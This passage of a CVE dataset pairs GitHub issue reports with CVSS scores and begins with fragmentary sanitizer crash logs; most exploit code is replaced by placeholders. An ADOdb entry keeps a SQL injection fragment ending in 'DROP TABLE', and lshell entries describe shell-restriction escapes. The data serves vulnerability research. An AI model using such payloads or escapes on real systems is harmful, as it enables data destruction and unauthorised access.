NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG d NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG e NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f NUMBERTAG f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 Shadow byte legend (one shadow byte 
represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING SHORT_READ NUMBERTAG APITAG lepton NUMBERTAG e2 START ACHIEVED NUMBERTAG ASAN:DEADLYSIGNAL APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG cec NUMBERTAG pc NUMBERTAG bp NUMBERTAG d NUMBERTAG sp NUMBERTAG ffc NUMBERTAG cfc1c0 T NUMBERTAG in setup_imginfo_jpg(bool) PATHTAG NUMBERTAG f in bool APITAG int, unsigned int>, APITAG int, unsigned int> > > , ibytestream ) PATHTAG NUMBERTAG in std::function<bool APITAG const PATHTAG NUMBERTAG in execute(std::function<bool ()> const&) PATHTAG NUMBERTAG d8af in APITAG , APITAG , int, bool) PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG da5d NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG afc8 in _start ( PATHTAG ) APITAG can not provide additional info. 
SUMMARY: APITAG SEGV PATHTAG in setup_imginfo_jpg(bool NUMBERTAG ABORTING SHORT_READ NUMBERTAG APITAG lepton NUMBERTAG e2 START ACHIEVED NUMBERTAG APITAG NUMBERTAG ERROR: APITAG global buffer overflow on address NUMBERTAG c9f NUMBERTAG at pc NUMBERTAG f1 bp NUMBERTAG ffeecdd5e NUMBERTAG sp NUMBERTAG ffeecdd5e NUMBERTAG READ of size NUMBERTAG at NUMBERTAG c9f NUMBERTAG thread T NUMBERTAG f0 in setup_imginfo_jpg(bool) PATHTAG NUMBERTAG f in bool APITAG int, unsigned int>, APITAG int, unsigned int> > > , ibytestream ) PATHTAG NUMBERTAG in std::function<bool APITAG const PATHTAG NUMBERTAG in execute(std::function<bool ()> const&) PATHTAG NUMBERTAG d8af in APITAG , APITAG , int, bool) PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG afc8 in _start ( PATHTAG NUMBERTAG c9f NUMBERTAG is located NUMBERTAG bytes to the left of global variable 'read_done' defined in PATHTAG NUMBERTAG c9f NUMBERTAG of size NUMBERTAG c9f NUMBERTAG is located NUMBERTAG bytes to the right of global variable 'overall_start' defined in PATHTAG NUMBERTAG c9ee0) of size NUMBERTAG SUMMARY: APITAG global buffer overflow PATHTAG in setup_imginfo_jpg(bool) Shadow bytes around the buggy address NUMBERTAG a NUMBERTAG b NUMBERTAG c NUMBERTAG d0: f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG e0:[f9]f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG f0: f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca 
redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING SHORT_READ NUMBERTAG APITAG lepton NUMBERTAG e2 START ACHIEVED NUMBERTAG APITAG NUMBERTAG ERROR: APITAG global buffer overflow on address NUMBERTAG c7c NUMBERTAG at pc NUMBERTAG d bp NUMBERTAG fff NUMBERTAG sp NUMBERTAG fff NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG c7c NUMBERTAG thread T NUMBERTAG c in build_huffcodes(unsigned char , unsigned char , APITAG , APITAG ) PATHTAG NUMBERTAG c in parse_jfif_jpg(unsigned char, unsigned int, unsigned char ) PATHTAG NUMBERTAG ffd0 in APITAG int, unsigned int>, APITAG int, unsigned int> > > const&, APITAG APITAG > ) PATHTAG NUMBERTAG in std::function<bool APITAG const PATHTAG NUMBERTAG in execute(std::function<bool ()> const&) PATHTAG NUMBERTAG ccc8 in APITAG , APITAG , int, bool) PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG afc8 in _start ( PATHTAG NUMBERTAG c7c NUMBERTAG is located NUMBERTAG bytes to the left of global variable 'hcodes' defined in PATHTAG NUMBERTAG c7c NUMBERTAG of size NUMBERTAG c7c NUMBERTAG is located NUMBERTAG bytes to the right of global variable 'htrees' defined in PATHTAG NUMBERTAG c5c NUMBERTAG of size NUMBERTAG SUMMARY: APITAG global buffer overflow PATHTAG in build_huffcodes(unsigned char , unsigned char , APITAG , APITAG ) Shadow bytes around the buggy address NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG f9[f9]f9 f NUMBERTAG f NUMBERTAG fa NUMBERTAG fb NUMBERTAG fc NUMBERTAG fd NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac 
Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING SHORT_READ NUMBERTAG APITAG lepton NUMBERTAG e2 START ACHIEVED NUMBERTAG APITAG NUMBERTAG ERROR: APITAG global buffer overflow on address NUMBERTAG cad0a at pc NUMBERTAG fe NUMBERTAG bp NUMBERTAG fff NUMBERTAG d NUMBERTAG b0 sp NUMBERTAG fff NUMBERTAG d NUMBERTAG a0 READ of size NUMBERTAG at NUMBERTAG cad0a thread T NUMBERTAG fe NUMBERTAG in APITAG unsigned short const ) PATHTAG NUMBERTAG fe NUMBERTAG in APITAG const , APITAG , APITAG const , unsigned int) PATHTAG NUMBERTAG b3a8 in APITAG APITAG >, std::vector<unsigned char, APITAG char> > ) PATHTAG NUMBERTAG b4ee in bool APITAG ( APITAG APITAG >, std::vector<unsigned char, APITAG char> > APITAG APITAG >, std::vector<unsigned char, APITAG char> > )>::__call<bool NUMBERTAG ul NUMBERTAG ul>(std::tuple APITAG &&, APITAG NUMBERTAG ul>) PATHTAG NUMBERTAG b4ee in bool APITAG ( APITAG APITAG >, std::vector<unsigned char, APITAG char> > APITAG APITAG >, std::vector<unsigned char, APITAG char> > APITAG APITAG PATHTAG NUMBERTAG b4ee in APITAG (), APITAG ( APITAG APITAG >, std::vector<unsigned char, APITAG char> > APITAG APITAG >, std::vector<unsigned char, APITAG char> > )> APITAG const&) PATHTAG NUMBERTAG in std::function<bool APITAG const PATHTAG NUMBERTAG in execute(std::function<bool ()> const&) PATHTAG NUMBERTAG ceb5 in APITAG , APITAG , int, bool) PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG fe3fb5cd NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG afc8 in _start ( PATHTAG NUMBERTAG cad0a is located NUMBERTAG bytes to the left of global variable 'chroma_debug_height' defined in PATHTAG NUMBERTAG cad NUMBERTAG of size NUMBERTAG cad0a is located NUMBERTAG bytes to the right of global variable 'raw_decoded_fp_Y' defined in PATHTAG NUMBERTAG cad NUMBERTAG of size NUMBERTAG SUMMARY: APITAG global buffer overflow PATHTAG in APITAG unsigned short const ) Shadow bytes around the buggy address 
NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG a NUMBERTAG f9]f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG b NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG c NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG d NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG e NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG f NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING SHORT_READ Thank you Marco",
  2765. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  2766. "severity": "MEDIUM",
  2767. "baseScore": 5.5,
  2768. "impactScore": 3.6,
  2769. "exploitabilityScore": 1.8
  2770. },
  2771. {
  2772. "CVE_ID": "CVE-2016-6250",
  2773. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/711",
  2774. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/711",
  2775. "Repo_new": "libarchive/libarchive",
  2776. "Issue_Created_At": "2016-05-28T18:49:50Z",
  2777. "description": "Integer overflow checking filename size for ISO NUMBERTAG Reported by: Christian Wressnegger, Alwin Maier, and Fabian Yamaguchi The ISO NUMBERTAG writer is subject to integer overflows when verifying the filename size. This can lead to a crash when writing ISO NUMBERTAG images with NUMBERTAG GB or NUMBERTAG GB filenames.",
  2778. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H",
  2779. "severity": "HIGH",
  2780. "baseScore": 8.6,
  2781. "impactScore": 4.7,
  2782. "exploitabilityScore": 3.9
  2783. },
  2784. {
  2785. "CVE_ID": "CVE-2016-6252",
  2786. "Issue_Url_old": "https://github.com/shadow-maint/shadow/issues/27",
  2787. "Issue_Url_new": "https://github.com/shadow-maint/shadow/issues/27",
  2788. "Repo_new": "shadow-maint/shadow",
  2789. "Issue_Created_At": "2016-07-24T14:55:21Z",
  2790. "description": "Incorrect integer handling CVETAG . Reported to APITAG bug tracker with proposed fix. CVETAG",
  2791. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  2792. "severity": "HIGH",
  2793. "baseScore": 7.8,
  2794. "impactScore": 5.9,
  2795. "exploitabilityScore": 1.8
  2796. },
  2797. {
  2798. "CVE_ID": "CVE-2016-6298",
  2799. "Issue_Url_old": "https://github.com/latchset/jwcrypto/issues/65",
  2800. "Issue_Url_new": "https://github.com/latchset/jwcrypto/issues/65",
  2801. "Repo_new": "latchset/jwcrypto",
  2802. "Issue_Created_At": "2016-08-31T02:34:07Z",
  2803. "description": "CVETAG : Million Messages Attack vulnerability. The jwcrypto implementation of the RSA NUMBERTAG algorithm is vulnerable to the Million Message Attack described in FILETAG . A timing attack can be leveraged against the implementation to detect when a chosen ciphertext generates a valid header and padding because invalid header/padding generates a code exception and cryptographic operations are terminated earlier resulting in measurably faster processing over the network. Many thanks to Dennis Detering APITAG for discovering and reporting this vulnerability.",
  2804. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
  2805. "severity": "MEDIUM",
  2806. "baseScore": 5.3,
  2807. "impactScore": 3.6,
  2808. "exploitabilityScore": 1.6
  2809. },
  2810. {
  2811. "CVE_ID": "CVE-2016-6305",
  2812. "Issue_Url_old": "https://github.com/openssl/openssl/issues/1563",
  2813. "Issue_Url_new": "https://github.com/openssl/openssl/issues/1563",
  2814. "Repo_new": "openssl/openssl",
  2815. "Issue_Created_At": "2016-09-10T17:12:28Z",
  2816. "description": "APITAG NUMBERTAG hangs (CPU pegged) when SSL_peek is used with TLS NUMBERTAG Code to reproduce: ERRORTAG Reproduces NUMBERTAG reliably for me. Switching APITAG to APITAG fixes it, and switching APITAG to APITAG or APITAG also fixes it. Therefore I believe, but have not confirmed, that URLTAG is the loop that's spinning. Demonstration of what this looks like: ERRORTAG",
  2817. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  2818. "severity": "HIGH",
  2819. "baseScore": 7.5,
  2820. "impactScore": 3.6,
  2821. "exploitabilityScore": 3.9
  2822. },
  2823. {
  2824. "CVE_ID": "CVE-2016-6521",
  2825. "Issue_Url_old": "https://github.com/sheehan/grails-console/issues/55",
  2826. "Issue_Url_new": "https://github.com/sheehan/grails-console/issues/55",
  2827. "Repo_new": "sheehan/grails-console",
  2828. "Issue_Created_At": "2016-08-03T21:00:17Z",
  2829. "description": "CSRF vulnerability, again. I'm afraid that the issue hasn't been fixed properly. I realized it today after deploying your new release. You can try: login (or simply visit in a barebone new grails application) the main app website, but DON'T visit the console. Trigger the poc I sent you the last time, and you'll see that it'll still work. After accessing the console the protection will be effective and the poc will stop working. I suspect that the reason might be the APITAG check. If the console hasn't been visited yet, there will be no APITAG in the session, and thus both side of the equations will be null , letting the check pass.",
  2830. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  2831. "severity": "HIGH",
  2832. "baseScore": 8.8,
  2833. "impactScore": 5.9,
  2834. "exploitabilityScore": 2.8
  2835. },
  2836. {
  2837. "CVE_ID": "CVE-2016-6521",
  2838. "Issue_Url_old": "https://github.com/sheehan/grails-console/issues/54",
  2839. "Issue_Url_new": "https://github.com/sheehan/grails-console/issues/54",
  2840. "Repo_new": "sheehan/grails-console",
  2841. "Issue_Created_At": "2016-07-01T08:57:42Z",
  2842. "description": "CSRF prevention. Same issue as URLTAG which was unfortunately not recognized for the severe bug that it is. Yesterday I explained privately the issue to MENTIONTAG and supplied him a POC. Will add the same information here once a fix is released (or otherwise to expedite its release), but for now this issue should merely serve to keep track of it publicly",
  2843. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  2844. "severity": "HIGH",
  2845. "baseScore": 8.8,
  2846. "impactScore": 5.9,
  2847. "exploitabilityScore": 2.8
  2848. },
  2849. {
  2850. "CVE_ID": "CVE-2016-6582",
  2851. "Issue_Url_old": "https://github.com/doorkeeper-gem/doorkeeper/issues/875",
  2852. "Issue_Url_new": "https://github.com/doorkeeper-gem/doorkeeper/issues/875",
  2853. "Repo_new": "doorkeeper-gem/doorkeeper",
  2854. "Issue_Created_At": "2016-08-12T20:19:36Z",
  2855. "description": "Token revocation uses wrong authorization method. The FILETAG states that when revoking a token, \"the client also includes its authentication credentials as described in FILETAG \". The spec's example request for revocation looks like this: CODETAG Note the HTTP Basic authentication, not Bearer. The spec goes on to say that the authorization server \"first validates the client credentials (in case of a confidential client) and then verifies whether the token was issued to the client making the revocation request. If this validation fails, the request is refused and the client is informed of the error by the authorization server as described below\". It appears as though Doorkeeper instead authorizes the request using HTTP Bearer with an access token.",
  2856. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  2857. "severity": "CRITICAL",
  2858. "baseScore": 9.1,
  2859. "impactScore": 5.2,
  2860. "exploitabilityScore": 3.9
  2861. },
  2862. {
  2863. "CVE_ID": "CVE-2016-6902",
  2864. "Issue_Url_old": "https://github.com/ghantoos/lshell/issues/147",
  2865. "Issue_Url_new": "https://github.com/ghantoos/lshell/issues/147",
  2866. "Repo_new": "ghantoos/lshell",
  2867. "Issue_Created_At": "2016-08-17T18:39:58Z",
  2868. "description": "Restriction overrun via simple trick. If you run something like APITAG or APITAG it will exec bash command. This can be avoided by adding && and || to forbidden list, but still.",
  2869. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
  2870. "severity": "CRITICAL",
  2871. "baseScore": 9.9,
  2872. "impactScore": 6.0,
  2873. "exploitabilityScore": 3.1
  2874. },
  2875. {
  2876. "CVE_ID": "CVE-2016-6903",
  2877. "Issue_Url_old": "https://github.com/ghantoos/lshell/issues/149",
  2878. "Issue_Url_new": "https://github.com/ghantoos/lshell/issues/149",
  2879. "Repo_new": "ghantoos/lshell",
  2880. "Issue_Created_At": "2016-08-17T19:36:05Z",
  2881. "description": "SECURITY ISSUE: Escape possible by using special keys. Just type APITAG , APITAG after any allowed command and then type desired restricted command: CODETAG",
  2882. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
  2883. "severity": "CRITICAL",
  2884. "baseScore": 9.9,
  2885. "impactScore": 6.0,
  2886. "exploitabilityScore": 3.1
  2887. },
  2888. {
  2889. "CVE_ID": "CVE-2016-6905",
  2890. "Issue_Url_old": "https://github.com/libgd/libgd/issues/248",
  2891. "Issue_Url_new": "https://github.com/libgd/libgd/issues/248",
  2892. "Repo_new": "libgd/libgd",
  2893. "Issue_Created_At": "2016-07-05T04:45:01Z",
  2894. "description": "Out Of Bounds Read in gd_tga.c. Hi, I'd like to report an OOB read issue to you. This issue can be triggered when parsing a specially crafted tga image. You can compile APITAG with APITAG to reproduce this issue. ERRORTAG Credit to Ke Liu of Tencent's Xuanwu LAB . Thanks.",
  2895. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  2896. "severity": "MEDIUM",
  2897. "baseScore": 6.5,
  2898. "impactScore": 3.6,
  2899. "exploitabilityScore": 2.8
  2900. },
  2901. {
  2902. "CVE_ID": "CVE-2016-7051",
  2903. "Issue_Url_old": "https://github.com/FasterXML/jackson-dataformat-xml/issues/211",
  2904. "Issue_Url_new": "https://github.com/fasterxml/jackson-dataformat-xml/issues/211",
  2905. "Repo_new": "fasterxml/jackson-dataformat-xml",
  2906. "Issue_Created_At": "2016-09-22T05:04:42Z",
  2907. "description": "Default changes for APITAG , consider disabling DTD handling. Although XML specification defines DTD handling as part of core xml processing, for most XML use cases for networking systems DTDs are either not used, or are minority use case. Conversely use of DTDs is often actually an anti pattern considering access restrictions and overhead. With this in mind, it would probably make sense to change defaults to disable DTD processing and just allow changing settings to enable it for cases where it is needed, as opposed to the other way around. Compared to other default changes it would probably make sense to actually add a specific feature; but if not possible, then just simple setter for APITAG . Regardless it'd be easier to do this than to expect user to pre configure APITAG .",
  2908. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N",
  2909. "severity": "HIGH",
  2910. "baseScore": 8.6,
  2911. "impactScore": 4.0,
  2912. "exploitabilityScore": 3.9
  2913. },
  2914. {
  2915. "CVE_ID": "CVE-2016-7075",
  2916. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/34517",
  2917. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/34517",
  2918. "Repo_new": "kubernetes/kubernetes",
  2919. "Issue_Created_At": "2016-10-11T01:24:04Z",
  2920. "description": "Client certificate auth is using the subject CN from the intermediate CA cert, not from the end entity cert. APITAG Is this a request for help? (If yes, you should use our troubleshooting guide and community support channels, see FILETAG I tried slack, someone else ran in to my issue as well and just used separate CAs What keywords did you search in Kubernetes issues before filing this one? (If you have found any duplicates, you should instead reply there.): intermediate certificate Is this a BUG REPORT or FEATURE REQUEST? (choose one): FEATURE REQUEST APITAG Kubernetes version (use kubectl version ): Client Version: APITAG Minor NUMBERTAG APITAG APITAG APITAG a git tree\", APITAG NUMBERTAG T NUMBERTAG Z\", APITAG Compiler:\"gc\", Platform:\"darwin/amd NUMBERTAG Server Version: APITAG Minor NUMBERTAG APITAG APITAG APITAG APITAG APITAG NUMBERTAG T NUMBERTAG Z\", APITAG Compiler:\"gc\", Platform:\"linux/amd NUMBERTAG Environment : Cloud provider or hardware configuration : aws OS (e.g. from /etc/os release): APITAG ID=coreos VERSION NUMBERTAG ERSION_ID NUMBERTAG BUILD_ID NUMBERTAG APITAG NUMBERTAG APITAG ANSI_COLOR NUMBERTAG HOME_URL=\" FILETAG \" BUG_REPORT_URL=\" CVETAG \" Kernel (e.g. ERRORTAG ): Linux ip NUMBERTAG APITAG NUMBERTAG coreos NUMBERTAG SMP Tue Sep NUMBERTAG UTC NUMBERTAG Intel(R) Xeon(R) CPU E NUMBERTAG GHz APITAG APITAG Install tools : kube aws Manually generated ssl certs Others : I'm using client cert+ABAC auth and have audit logging enabled. What happened : Clients using SSL certs for auth show the subject CN of their intermediate cert not their entity cert. I set the client cert to a certificate chain: APITAG Cert> APITAG Cert> APITAG Cert> ca.pem on all machines is set to the Root Cert What you expected to happen : I expect the client to use the Subject CN of the entity cert. The key I'm using is for the entity and the connection is secure, My audit logs just show the CN for the intermediate CA. 
How to reproduce it (as minimally and precisely as possible): Create a root CA cert Use it to sign an intermediate CA cert. Use root cert as CA, use certificate chain bundle as client cert, use correct client key Anything else do we need to know : I've never had the sub ca key file on any machine (it's in a yubikey) I'm seeing this in audit logs when I use the chain NUMBERTAG APITAG AUDIT: id NUMBERTAG f NUMBERTAG c d NUMBERTAG b af NUMBERTAG cca NUMBERTAG e6eee\" APITAG method=\"GET\" APITAG Key1 Sub CA\" as=\" APITAG \" namespace=\" APITAG \" PATHTAG When I set the ca.pem to my sub ca key and don't use my bundled certs, I see NUMBERTAG APITAG AUDIT: id NUMBERTAG c NUMBERTAG f e NUMBERTAG b NUMBERTAG a NUMBERTAG ca4ef NUMBERTAG ec\" APITAG method=\"GET\" user=\"kube worker\" as=\" APITAG \" namespace=\" APITAG \" PATHTAG",
  2921. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  2922. "severity": "HIGH",
  2923. "baseScore": 8.1,
  2924. "impactScore": 5.9,
  2925. "exploitabilityScore": 2.2
  2926. },
  2927. {
  2928. "CVE_ID": "CVE-2016-7103",
  2929. "Issue_Url_old": "https://github.com/jquery/api.jqueryui.com/issues/281",
  2930. "Issue_Url_new": "https://github.com/jquery/api.jqueryui.com/issues/281",
  2931. "Repo_new": "jquery/api.jqueryui.com",
  2932. "Issue_Created_At": "2015-10-19T13:40:23Z",
  2933. "description": "XSS Vulnerability on APITAG option of Dialog APITAG UI. I couldn't submit the bug to the website CVETAG VULNERABILITY DETAILS A potential bug enables us to inject the XSS content into APITAG option using component ui dialog. As original of APITAG UI( URLTAG we shall not accept any HTML string inside it. VERSION Any site using the latest version APITAG UI NUMBERTAG REPRODUCTION CASE Create a new HTML page. Inject this content into new page. ERRORTAG A alert popup was shown. Completed. IN CONCLUSION We expect that the html string isn't allowed in the APITAG option as well as the popup alert not shown. If it displays, any attacker can take advantage of injecting the malicious XSS content into website. Please see details at here URLTAG",
  2934. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  2935. "severity": "MEDIUM",
  2936. "baseScore": 6.1,
  2937. "impactScore": 2.7,
  2938. "exploitabilityScore": 2.8
  2939. },
  2940. {
  2941. "CVE_ID": "CVE-2016-7163",
  2942. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/826",
  2943. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/826",
  2944. "Repo_new": "uclouvain/openjpeg",
  2945. "Issue_Created_At": "2016-09-08T10:01:15Z",
  2946. "description": "CVETAG Integer overflow in opj_pi_create_decode. This issue is used to track CVETAG . Fixed by c NUMBERTAG bc NUMBERTAG URLTAG and ef NUMBERTAG f NUMBERTAG URLTAG . APITAG is available at FILETAG .",
  2947. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  2948. "severity": "HIGH",
  2949. "baseScore": 7.8,
  2950. "impactScore": 5.9,
  2951. "exploitabilityScore": 1.8
  2952. },
  2953. {
  2954. "CVE_ID": "CVE-2016-7164",
  2955. "Issue_Url_old": "https://github.com/arvidn/libtorrent/issues/1021",
  2956. "Issue_Url_new": "https://github.com/arvidn/libtorrent/issues/1021",
  2957. "Repo_new": "arvidn/libtorrent",
  2958. "Issue_Created_At": "2016-08-21T12:56:33Z",
  2959. "description": "APITAG fault\" (possible APITAG when parsing compressed data with function \"inflate_gzip\". libtorrent version (or branch NUMBERTAG platform/architecture: Ubuntu NUMBERTAG LTS NUMBERTAG compiler and compiler version: gcc version NUMBERTAG APITAG NUMBERTAG APITAG The issue was found with \"afl fuzzer\" while executing a modified version of the \"test_gzip\" testsuite with the following input data(displayed in base NUMBERTAG format): CODETAG A segmentation fault signal was captured while running: APITAG The output from ASAN: ERRORTAG The issue seems to be located in the puff.cpp file inside the \"construct\" function. To reproduce NUMBERTAG compile APITAG (here attached NUMBERTAG copy the base NUMBERTAG encoded data to a file (ex. APITAG NUMBERTAG decode the file to a new file (\"base NUMBERTAG d gzip_data.b NUMBERTAG gzip_data NUMBERTAG run ./test_gzip gzip_data FILETAG",
  2960. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  2961. "severity": "HIGH",
  2962. "baseScore": 7.5,
  2963. "impactScore": 3.6,
  2964. "exploitabilityScore": 3.9
  2965. },
  2966. {
  2967. "CVE_ID": "CVE-2016-7166",
  2968. "Issue_Url_old": "https://github.com/libarchive/libarchive/issues/660",
  2969. "Issue_Url_new": "https://github.com/libarchive/libarchive/issues/660",
  2970. "Repo_new": "libarchive/libarchive",
  2971. "Issue_Created_At": "2016-02-21T16:19:23Z",
  2972. "description": "Possible denial of service using a crafted gzip file. This issue has been reported by me on the APITAG bugtracker CVETAG . The mentioned example file has been attached to the bug report there which is reproduced below. > The APITAG tar NUMBERTAG program uses a heuristic to check if an archive file is compressed. If it is, it calls into an appropriate library to receive a decompressed stream. Then it applies the heuristic again to catch the case of an archive that has been compressed multiple times. There is no limit to the number of recursive decompressions. > > Using a crafted gzip file (the attached file is a quine that unpacks to itself), one can get tar NUMBERTAG to invoke an infinite chain of gzip compressors until all the memory on the machine running tar NUMBERTAG has been exhausted or another resource limit kicks in. > > I see this behaviour as a bug and security problem. It can be used to perform denial of service attacks against machines that run APITAG and use tar NUMBERTAG to list the contents of untrusted archives.",
  2973. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  2974. "severity": "MEDIUM",
  2975. "baseScore": 5.5,
  2976. "impactScore": 3.6,
  2977. "exploitabilityScore": 1.8
  2978. },
  2979. {
  2980. "CVE_ID": "CVE-2016-7405",
  2981. "Issue_Url_old": "https://github.com/ADOdb/ADOdb/issues/226",
  2982. "Issue_Url_new": "https://github.com/adodb/adodb/issues/226",
  2983. "Repo_new": "adodb/adodb",
  2984. "Issue_Created_At": "2016-04-17T00:52:12Z",
  2985. "description": "SECURITY: ADODB qstr does not quote properly with PDO. In ADODB NUMBERTAG using the PDO driver results in qstr not behaving properly, leading to SQL injection. The same method called with the APITAG driver works as expected. Example code: CODETAG Example results: CODETAG Note the unescaped backslash and different style of single quote escaping in the ADODB PDO example. This is an exploitable vulnerability: Exploit code: ERRORTAG Exploit results: CODETAG APITAG NUMBERTAG for \"; DROP TABLE APITAG",
  2986. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  2987. "severity": "CRITICAL",
  2988. "baseScore": 9.8,
  2989. "impactScore": 5.9,
  2990. "exploitabilityScore": 3.9
  2991. },
  2992. {
  2993. "CVE_ID": "CVE-2016-7420",
  2994. "Issue_Url_old": "https://github.com/weidai11/cryptopp/issues/277",
  2995. "Issue_Url_new": "https://github.com/weidai11/cryptopp/issues/277",
  2996. "Repo_new": "weidai11/cryptopp",
  2997. "Issue_Created_At": "2016-09-15T21:07:01Z",
  2998. "description": "Library documentation lacks treatment of DNDEBUG and Static Initialization. From a recent discussion with the Debian Security Team: > On Thu, Sep NUMBERTAG at NUMBERTAG PM, Jeffrey Walton < EMAILTAG > wrote: > > Thanks Florian. > > > >> this matter does not seem to be something for the Debian security > >> team. Debian doesn't enable coredumps by default, and crypto++ > >> upstream doesn't document that builds without DNDEBUG are unsafe > >> (say, due to denial of service issues caused by broken asserts). > > > > Fair enough, done. We added information to both FILETAG and > > APITAG see > > URLTAG > > . > > > > Are there other places we should disseminate the information? I want > > to ensure you are looking in places I expect you to look (i.e., we are > > not suffering a disconnect). > > For completeness, the asserts are working as expected; they are not broken. The problem is many distros and developers fail to add APITAG for 